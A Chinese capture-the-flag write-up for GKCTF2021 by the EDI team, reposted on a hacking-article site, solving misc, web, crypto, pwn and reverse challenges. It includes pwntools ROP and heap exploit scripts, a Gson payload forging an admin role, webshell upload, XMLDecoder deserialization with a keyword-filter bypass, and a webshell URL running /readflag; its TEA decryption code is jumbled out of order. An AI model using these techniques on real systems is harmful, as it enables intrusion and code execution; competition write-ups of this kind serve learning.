记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

【WP】GKCTF2021 By EDI战队

2021-06-27 15:16
            

点击上方“蓝字”,关注更多精彩


MISC

签到

1、打开流量找到cat /f4g的流量,追踪http流

2、将第一个看到的一串数字,十六进制转字符串再base64解码后,发现是空的

3、接着找到下面的重新转,发现转到base64解码后,无法再base64解码了

4、仔细和上面的base64对比发现,原来这个base64完全倒了,于是写脚本逆过来解密,发现双写的flag

import base64

f1 = open('flagsign.txt''w')

content = list('wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQDjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0iCNMyIjMyIjMyIjMyI6AjMgAzMtMDMtEjMwIjO0eZ62ep5K0wKrQWYwVGdv5EItAiM1Aydl5mK6M6jlfpqnrQDt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLK0AIdZavo75mlvlCNMTM6EDMz0yMw0SMyAjM6Q7lpb7lmrQDrsCZhBXZ09mTg0CIyUDI3VmbqozoPW+lqeuCN0SLt0SLt0SLt0SLsxWZld1V913e7d2ZhFGbsZmZg0lp9iunbW+Wg0lp9iunbW+Wg0lp9iunbW+WK0wMxoTMwoDMyACMDN0QDN0QDlWazNXMx0Wbf9lRGRDNDN0ard0Rf9VZl1WbwADIdRampDKilvFIdRampDKilvVKpM2Y==QIhM0QDN0Q')

content.reverse()

flag1 = "".join(content).split("==")

print(flag1)

print(base64.b64decode(flag1[0]+"=="))

print(base64.b64decode(flag1[1]+"=="))


5、手动提取flag

flag{Welc0me_GkC4F_m1siCCCCCC!}

你知道apng吗

1、百度搜索apng发现是动图,于是想办法找到能够让apng正常运行的软件,发现firefox可以让apng图片正常显示,是小女孩抱着花走路跳的动图。

2、继续百度,到一个apngdis的软件,将apng拆分

3、在拆分好的图片找二维码分别在第2、10、18、26有二维码

flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}


FireFox_Forensics

1、通过github搜索到一个软件firepwd直接解密得到flag

https://github.com/lclevy/firepwd

GKCTF{9cf21dda-34be-4f6c-a629-9c4647981ad7}

excel骚操作

1、打开excel,页面上说我看到flag了,你呢?于是想是不是把什么东西隐藏起来了,左点右点发现里面有的格子有1有的没有,直接拉一个大范围改常规格式

2、发现1的走势有点奇怪于是调整列宽,然后填充,发现原来是汉信码

3、扫码得到flag

flag{9ee0cb62-f443-4a72-e9a3-43c0b910757e}

银杏岛の奇妙冒险

1、玩游戏将生存模式改为创造模式,打赢书上面给的坐标处的怪物,会给一本新书,里面就是flag和下一个坐标。

得到flag{w31c0me_t0_9kctf_2021_Check_1n}

问卷题

flag{787c37cc-5ec2-9aae-f9c5-c1cc624caec0}



WEB

easycms

http://bbfc2a5d-0b65-4797-a93b-d24f0bf88bf9.node3.buuoj.cn/index.php?mode=getconfig

获取版本后网上找源码本地搭建


发现存在demo用户


使用demo/demo登录进入后台,这个cms高危操作要验证文件

可以在素材重命名的地方 上传一个txt文件 然后移动到tmp上 绕过文件验证

../../../../../system/tmp/giny


随后修改模板为cat flag


访问首页获取flag


babycat

register接口注册个用户进入系统


在download test的地方存在任意文件读取漏洞 发现需要执行readflag


读取web.xml后依次读取所有的class文件


审计代码这里可以通过gson的兼容性 创建一个role为admin的用户



payload={"data":"{\"username\":\"%s\",\"role\":'admin',\"password\":\"123\",\"role\":\"123\",'role':admin}"%(name)}

得到用户密码

gPFOUvzf/123

随后继续审计

在web2/WEB-INF/classes/com/web/servlet/uploadServlet.class处

发现上传文件的关键点没return 这waf等于没用 直接写shell了


upload目录无法访问 所以写到static下面


读取flag




babycat-revenge

和babycat一样 可以上传文件 但是这里解决了waf失效的问题 所以肯定就不能直接shell了。



仔细看 发现了xml格式是允许的


在登录接口 发现每次都会有新建数据库变量的操作


跟进发现数据库连接是通过读取db.xml来获取配置信息的 这里可以看到 存在xmldecoder反序列化



这里逻辑就很清晰了 首先覆盖db.xml文件为恶意代码然后登录触发反序列化。

反序列化可以研究一下文件上传的waf 限制了"Runtime", "exec", "ProcessBuilder", "jdbc", "autoCommit"

这里可以用printwrite来写shell(也给提示了

内容检测的话 可以直接使用unicode绕过

先覆盖db.xml


然后再次请求登录触发反序列化 写入shell(这里的绝对路径是从babycat拿的 忘了读环境变量 耽误了一血)



http://82804f15-8abb-4094-ba41-7555407568a3.node3.buuoj.cn/static/1.jsp?pwd=b&i=/readflag




CRYPTO

Random

python的rng用的mt19937,考烂了

用randcrack模块梭

from hashlib import md5
from randcrack import RandCrack
def foo(l,i):
a=[]
a.append(l[i])
b1=l[i+1]>>32
b2=l[i+1]&(2**32-1)
a.append(b2)
a.append(b1)
b1=l[i+2]>>64
b2=(l[i+2]&(2**64-1))>>32
b3=l[i+2]&(2**32-1)
a.append(b3)
a.append(b2)
a.append(b1)
return a
with open(r'random.txt','r') as f:
l=f.readlines()
l=[int(i.strip()) for i in l]
ll=[]
for i in range(0,len(l),3):
ll+=foo(l,i)
rc=RandCrack()
for i in ll:
rc.submit(i)
aa=rc.predict_getrandbits(32)
print('flag{%s}'%md5(str(aa).encode()).hexdigest())

RRRRsa

from Crypto.Util.number import *
from gmpy2 import gcd
e=65537
c=13492392717469817866883431475453770951837476241371989714683737558395769731416522300851917887957945766132864151382877462142018129852703437240533684604508379950293643294877725773675505912622208813435625177696614781601216465807569201380151669942605208425645258372134465547452376467465833013387018542999562042758
n1=75003557379080252219517825998990183226659117019770735080523409561757225883651040882547519748107588719498261922816865626714101556207649929655822889945870341168644508079317582220034374613066751916750036253423990673764234066999306874078424803774652754587494762629397701664706287999727238636073466137405374927829
c1=68111901092027813007099627893896838517426971082877204047110404787823279211508183783468891474661365139933325981191524511345219830693064573462115529345012970089065201176142417462299650761299758078141504126185921304526414911455395289228444974516503526507906721378965227166653195076209418852399008741560796631569
hint1=23552090716381769484990784116875558895715552896983313406764042416318710076256166472426553520240265023978449945974218435787929202289208329156594838420190890104226497263852461928474756025539394996288951828172126419569993301524866753797584032740426259804002564701319538183190684075289055345581960776903740881951
hint2=52723229698530767897979433914470831153268827008372307239630387100752226850798023362444499211944996778363894528759290565718266340188582253307004810850030833752132728256929572703630431232622151200855160886614350000115704689605102500273815157636476901150408355565958834764444192860513855376978491299658773170270
n2=114535923043375970380117920548097404729043079895540320742847840364455024050473125998926311644172960176471193602850427607899191810616953021324742137492746159921284982146320175356395325890407704697018412456350862990849606200323084717352630282539156670636025924425865741196506478163922312894384285889848355244489
c2=67054203666901691181215262587447180910225473339143260100831118313521471029889304176235434129632237116993910316978096018724911531011857469325115308802162172965564951703583450817489247675458024801774590728726471567407812572210421642171456850352167810755440990035255967091145950569246426544351461548548423025004
hint3=25590923416756813543880554963887576960707333607377889401033718419301278802157204881039116350321872162118977797069089653428121479486603744700519830597186045931412652681572060953439655868476311798368015878628002547540835719870081007505735499581449077950263721606955524302365518362434928190394924399683131242077
hint4=104100726926923869566862741238876132366916970864374562947844669556403268955625670105641264367038885706425427864941392601593437305258297198111819227915453081797889565662276003122901139755153002219126366611021736066016741562232998047253335141676203376521742965365133597943669838076210444485458296240951668402513
a=pow(2020*(hint2-212121),202020,n1)
b=pow(2021,202020,n1)*hint1
q1=gcd(a-b%n1,n1)
p=pow(c1,inverse(e,(q1-1)*(n1//q1-1)),n1)
a=pow(hint3,212121,n2)*pow(2020,212121*202020,n2)%n2
b=pow(hint4,202020,n2)*pow(2021,212121*202020,n2)%n2
p2=gcd(a-b%n2,n2)
q=pow(c2,inverse(e,(p2-1)*(n2//p2-1)),n2)
m=pow(c,inverse(e,(p-1)*(q-1)),p*q)
print(long_to_bytes(m))

PWN

checkin

#coding:utf-8
import sys
from pwn import *
context.log_level='debug'
elfelf='./login'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
if len(sys.argv)==1 :
io=process(elfelf)
# io=process([elf,'127.0.0.1','9999'])
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]
else :
io=remote('node3.buuoj.cn',26961)
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]
io.recv()
pay='admin\x00\x00\x00'+p64(0x0000000000401ab3)+p64(elf.got['puts'])+p64(0x4018B5)
io.send(pay)
io.recv()
io.send('admin\x00\x00\x00'+p64(0)*3+p64(0x602400))

libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
libc.address=libc_base
bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']
io.recv()
pay='admin\x00\x00\x00'*3+p64(0x4527a+libc_base)
io.send(pay)
io.recv()
# gdb.attach(io)
io.send('admin\x00\x00\x00'*4+p64(0x602418))

success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))

#
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue

demo_catroom

#coding:utf-8
import sys
from pwn import *
context.log_level='debug'
elfelf='./client'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
if len(sys.argv)==1 :
# io=process(elfelf)
# sh=process('./server')
io=process(['./client','117.21.200.165','27268'])
# libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
# one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]
else :
# sh=ssh(host='node3.buuoj.cn', user='ctf', port=25744, password='123456')
# io=remote('node3.buuoj.cn',28324)
# libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]

def add(a,b):
io.sendlineafter('0 exit \n','1')
io.sendlineafter('\n',a)
io.sendlineafter('\n',b)
def login(a,b):
io.sendlineafter('0 exit \n','2')
io.sendlineafter('\n',a)
io.sendlineafter('\n',b)
def show(a):
io.sendlineafter('0 exit \n','3')
io.send(a)
return io.recv()
def delete(a,b):
io.sendlineafter('0 exit \n','4')
io.sendlineafter('\n',a)
io.sendlineafter('\n',b)
add('a','a')
add('b','b')
add('c','c')
delete('a','a')
add('a'*0x20,'a'*0x28+'\xff'*8+'admin')
login('admin','b')
# sh.recv()
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue

RE

QQQQT

Base58

12t4tww3r5e77


Crash

Golang恢复符号表后 main函数中限定了flag长度为43且格式为GKCTF{}

后进入main_check

第一个main_encrypto中有Encrypt_DesEncrypt,中又包含crypto_des_NewTripleDESCipher 所以是3des

秘钥已经给出:

解密即可

剩下的三个第一个为sha256

第二个为sha512

最后一个为md5

爆破解密即可,需要注意的是每个均为4个字节





APK-debug

Native里tea

需要注意的是key被改了

解密就行

#include <stdio.h>
void DecryptTEA(unsigned int *firstChunk, unsigned int *secondChunk, unsigned int* key)
{
unsigned int sum = 0;
unsigned int y = *firstChunk;
unsigned int z = *secondChunk;
unsigned int delta = 0x458BCD42;
sum = delta << 5;
for (int i = 0; i < 32; i++)
{

int main() {
unsigned int key[4] = {9, 7, 8, 6};
unsigned int data[2] = {0xF5A98FF3, 0xA21873A3};
DecryptTEA(&data[0], &data[1], key);
printf("0x%x 0x%x\n", data[0], data[1]);
printf("%s\n",(char*)data);
}
z -= (y << 4) + key[2] ^ y + sum ^ (y >> 5) + key[3];
y -= (z << 4) + key[0] ^ z + sum ^ (z >> 5) + key[1];
sum -= delta;
}
*firstChunk = y;
*secondChunk = z;
}

  • 更多CTF-Wrietup 请关注EDI安全!

    EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。

    欢迎各位大佬小白入驻,大家一起打CTF,一起进步。                    

     


扫码关注

了解更多



知识来源: https://mp.weixin.qq.com/s?__biz=MzIzMTQ4NzE2Ng==&mid=2247488643&idx=1&sn=fc6838f86df389832ffe764f56617e51

阅读:1440944 | 评论:0 | 标签:CTF

想收藏或者和大家分享这篇好文章→复制链接地址

“【WP】GKCTF2021 By EDI战队”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

客黑业创的万千入年个一

❤用费0款退球星,年1期效有员会

🧠富财控掌,知认升提,长成起一💡

标签云 ☁